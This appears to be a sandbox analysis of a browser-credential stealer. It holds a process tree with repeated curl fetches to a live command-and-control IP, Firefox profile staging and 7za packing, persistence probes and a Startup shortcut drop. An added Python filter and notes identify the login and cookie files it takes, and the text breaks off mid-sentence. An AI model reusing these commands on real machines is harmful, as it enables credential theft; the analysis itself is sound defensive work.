                              cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
                              - System Location Discovery: System Language Discovery
                                C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe  (PID 4312)
                                  cmdline: C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"
                                  - Executes dropped EXE
                                  - System Location Discovery: System Language Discovery
                                  - Suspicious use of AdjustPrivilegeToken
                            C:\Windows\SysWOW64\cmd.exe  (PID 3436)
                              cmdline: "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"
                                C:\Windows\SysWOW64\curl.exe  (PID 4252)
                                  cmdline: curl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵
- System Location Discovery: System Language Discovery
PID:2840 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"8⤵
- System Location Discovery: System Language Discovery
PID:3556 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"9⤵PID:3328
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"8⤵PID:3432
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:4820
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1316
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"8⤵PID:3956
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"9⤵PID:3336
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:736
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:3948
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:3392
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\qoaen" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=7a0e7ff378475ac947884c10019889bc*2&jwvs=3A78C5703B2D9750556C36A3F42A4C"8⤵
- System Location Discovery: System Language Discovery
PID:4060 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\qoaen" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=7a0e7ff378475ac947884c10019889bc*2&jwvs=3A78C5703B2D9750556C36A3F42A4C"9⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tywfn" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵PID:3972
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\tywfn" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:1320
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\glxna" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=3A78C5703B2D9750556C36A3F42A4C"8⤵PID:1344
-
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\glxna" "178.215.224.74/v10/ukyh.php?jspo=2022&jwvs=3A78C5703B2D9750556C36A3F42A4C"9⤵PID:1584
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ibyeu" "178.215.224.74/v10/ukyh.php?jspo=6"8⤵
- System Location Discovery: System Language Discovery
PID:3804 -
C:\Windows\SysWOW64\curl.execurl -s -o "C:\Users\Admin\AppData\Local\temp\ibyeu" "178.215.224.74/v10/ukyh.php?jspo=6"9⤵PID:4900
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵PID:4984
-
-
-
-
   [5] C:\Windows\SysWOW64\cmd.exe (PID 2624): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 3956): curl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 4268): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"
    [6] C:\Windows\SysWOW64\curl.exe (PID 1420): curl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3476): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 3516): curl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3720): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 3980): curl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 4052): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 2324): curl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1728): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 2264): curl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 4372): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"
    [6] C:\Windows\SysWOW64\curl.exe (PID 3844): curl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 5032): "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
    [6] C:\Windows\SysWOW64\reg.exe (PID 4964): REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 992): "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
    [6] C:\Windows\SysWOW64\reg.exe (PID 1952): reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

   [5] C:\Windows\SysWOW64\cmd.exe (PID 4904): "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
    [6] C:\Windows\SysWOW64\schtasks.exe (PID 2564): SCHTASKS /QUERY /TN MyTasks\DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2812): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 3464): curl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 4312): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
    [6] C:\Windows\SysWOW64\curl.exe (PID 4320): curl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2972): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 3612): curl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2848): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 2576): curl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 4292): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 1960): curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3632): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 1324): curl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 4844): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 3900): curl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2040): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"
    [6] C:\Windows\SysWOW64\curl.exe (PID 4372): curl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1612): "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\reg.exe (PID 4652): REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3184): "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\reg.exe (PID 3864): reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
      signatures: System Location Discovery: System Language Discovery

   [5] C:\Windows\SysWOW64\cmd.exe (PID 5044): "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
    [6] C:\Windows\SysWOW64\schtasks.exe (PID 4676): SCHTASKS /QUERY /TN MyTasks\DolphinDumps
      signatures: System Location Discovery: System Language Discovery

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3080): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 5108): curl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1420): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 3036): curl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2564): "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\reg.exe (PID 1184): REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3768): "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\reg.exe (PID 3688): reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
      signatures: System Location Discovery: System Language Discovery

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1688): "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
    [6] C:\Windows\SysWOW64\schtasks.exe (PID 1244): SCHTASKS /QUERY /TN MyTasks\DolphinDumps
      signatures: System Location Discovery: System Language Discovery

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1924): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 3700): curl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1424): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 1320): curl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2088): "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
    [6] C:\Windows\SysWOW64\reg.exe (PID 3296): REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
      signatures: System Location Discovery: System Language Discovery

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2536): "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
    [6] C:\Windows\SysWOW64\reg.exe (PID 2768): reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

   [5] C:\Windows\SysWOW64\cmd.exe (PID 436): "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\schtasks.exe (PID 4476): SCHTASKS /QUERY /TN MyTasks\DolphinDumps
      signatures: System Location Discovery: System Language Discovery

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2700): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 544): curl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3692): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 1092): curl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2384): "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\reg.exe (PID 4676): REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1944): "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\reg.exe (PID 1912): reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
      signatures: System Location Discovery: System Language Discovery

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1040): "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\schtasks.exe (PID 3580): SCHTASKS /QUERY /TN MyTasks\DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3192): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lblct" "178.215.224.74/v10/ukyh.php?jspo=6"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 4352): curl -s -o "C:\Users\Admin\AppData\Local\temp\lblct" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3104): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hoyea" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 1748): curl -s -o "C:\Users\Admin\AppData\Local\temp\hoyea" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 3220): "C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps
    [6] C:\Windows\SysWOW64\reg.exe (PID 4204): REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1672): "C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript
    [6] C:\Windows\SysWOW64\reg.exe (PID 3436): reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

   [5] C:\Windows\SysWOW64\cmd.exe (PID 1928): "C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps
    [6] C:\Windows\SysWOW64\schtasks.exe (PID 1400): SCHTASKS /QUERY /TN MyTasks\DolphinDumps

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2040): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fsduy" "178.215.224.74/v10/ukyh.php?jspo=6"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 1708): curl -s -o "C:\Users\Admin\AppData\Local\temp\fsduy" "178.215.224.74/v10/ukyh.php?jspo=6"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 624): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bqnfn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=true&nzrj=00000&sftb=true"
     signatures: System Location Discovery: System Language Discovery
    [6] C:\Windows\SysWOW64\curl.exe (PID 4768): curl -s -o "C:\Users\Admin\AppData\Local\temp\bqnfn" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=true&nzrj=00000&sftb=true"

   [5] C:\Windows\SysWOW64\cmd.exe (PID 2276): "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hbupo" "178.215.224.74/v10/ukyh.php?jspo=6"
    [6] C:\Windows\SysWOW64\curl.exe (PID 940): curl -s -o "C:\Users\Admin\AppData\Local\temp\hbupo" "178.215.224.74/v10/ukyh.php?jspo=6"

  [4] C:\Windows\SysWOW64\choice.exe (PID 2516): choice /d y /t 5

[2] C:\Windows\SysWOW64\cmd.exe (PID 1756): cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & echo URL="C:\Users\Admin\AppData\Local\SafeNet Solutions Inc\CyberGuard.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberGuard.url" & exit
  signatures: Drops startup file; System Location Discovery: System Language Discovery

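The robocopy call in the tree above (PID 2072) is what decides which parts of the Firefox directory reach the Firefoxcopy staging folder that 7za.exe (PID 4312) then packs, so its exclusion lists say what the stealer keeps. The script below is an added example, written for this page rather than taken from the sample or the sandbox: it re-implements robocopy's /E, /XF and /XD semantics in Python for the exact lists captured above and runs them over a constructed listing of a Firefox data directory. The file names in that listing are typical Firefox profile files and are not from this report; only the profile folder name yuzka873.default-release appears on the page. What it shows is that the exclusions drop lock files, favicons, session restore, extensions, telemetry and crash data, while key4.db, logins.json, cert9.db, cookies.sqlite, places.sqlite and formhistory.sqlite, which together hold saved logins, cookies, history and form data, are all copied.

```python
"""Re-implementation of the robocopy filter the sample uses to stage a Firefox
profile (added example; not the sample's code). The exclusion lists are copied
from the captured command line; the listing at the bottom is constructed."""
import fnmatch

# /XF from the captured command line: file-name patterns, matched on the name only
EXCLUDED_FILES = ["*.lock", "favicons.sqlite", "favicons.sqlite-shm", "favicons.sqlite-wal"]

# /XD from the captured command line: directory names, excluded at any depth
EXCLUDED_DIRS = {
    "Background Tasks Profiles", "Pending Pings", "Crash Reports", "bookmarkbackups",
    "browser-extension-data", "features", "personality-provider", "settings", "crashes",
    "datareporting", "extensions", "minidumps", "saved-telemetry-pings", "security_state",
    "sessionstore-backups", "storage", "weave", "gmp-widevinecdm", "gmp-gmpopenh264",
}
_EXCLUDED_DIRS_CI = {d.lower() for d in EXCLUDED_DIRS}


def is_copied(rel_path: str) -> bool:
    """True if `robocopy SRC DST /E /XF ... /XD ...` would copy this file.

    rel_path is relative to the Firefox directory with '/' separators. /E copies
    every subdirectory; /XD drops any directory whose name is listed (and all of
    its contents); /XF drops files whose name matches a pattern. Windows paths
    are case-insensitive, so everything is compared lower-cased.
    """
    *dirs, name = rel_path.split("/")
    if any(d.lower() in _EXCLUDED_DIRS_CI for d in dirs):
        return False
    return not any(fnmatch.fnmatchcase(name.lower(), p.lower()) for p in EXCLUDED_FILES)


def staged_files(listing):
    """The subset of `listing` that ends up in the Firefoxcopy staging directory."""
    return [p for p in listing if is_copied(p)]


# Constructed listing of a typical Firefox data directory (not from the report;
# only the profile folder name yuzka873.default-release appears on the page).
PROFILE = "Profiles/yuzka873.default-release"
SAMPLE_LISTING = [
    "profiles.ini",
    "Crash Reports/InstallTime20241001",
    f"{PROFILE}/key4.db",             # NSS key store that protects logins.json
    f"{PROFILE}/logins.json",         # saved usernames and passwords
    f"{PROFILE}/cert9.db",
    f"{PROFILE}/cookies.sqlite",      # session cookies
    f"{PROFILE}/places.sqlite",       # history and bookmarks
    f"{PROFILE}/formhistory.sqlite",  # autofill data
    f"{PROFILE}/favicons.sqlite",
    f"{PROFILE}/favicons.sqlite-wal",
    f"{PROFILE}/parent.lock",
    f"{PROFILE}/sessionstore-backups/recovery.jsonlz4",
    f"{PROFILE}/storage/default/https+++example.com/ls/data.sqlite",
    f"{PROFILE}/extensions/example-addon.xpi",
    f"{PROFILE}/bookmarkbackups/bookmarks-2024-11-12.jsonlz4",
    f"{PROFILE}/datareporting/state.json",
]

if __name__ == "__main__":
    for path in staged_files(SAMPLE_LISTING):
        print("staged:", path)
```

One further observation on the same pipeline: the captured 7za.exe command passes -mhe=on (header encryption) but no -p switch. 7-Zip only encrypts anything when a password is supplied, so unless one reached 7za some other way the staged archive is a plain 7z and the profile copy inside it is readable to anyone who recovers the file from the DolphinDumps directory or from the network.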
Network
MITRE ATT&CK Enterprise v15
Credential Access
- Credentials from Password Stores (T1555): 1
  - Credentials from Web Browsers (T1555.003): 1
- Unsecured Credentials (T1552): 1
  - Credentials In Files (T1552.001): 1
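The ATT&CK mapping above only covers the credential-theft part of the tree. As an added example, written for this page and not taken from the sample or the sandbox, the script below shows how the whole chain can be recognised from process-creation command lines alone: silent curl fetches from a bare IP into %LOCALAPPDATA%\temp under five-letter random names, a browser profile copied to a staging directory, that directory packed with 7za, the staging directory deleted afterwards, the Run-key, UserInitMprLogonScript and schtasks persistence probes, and the Startup .url that points at a .js file. EVENTS is constructed from command lines on this page (one record per behaviour, PIDs as captured); its field names are an assumption, not any EDR's schema. The browser-path check also accepts Chrome and Edge profile directories, which goes beyond what this sample does. The jwvs and melq query values are pulled out as 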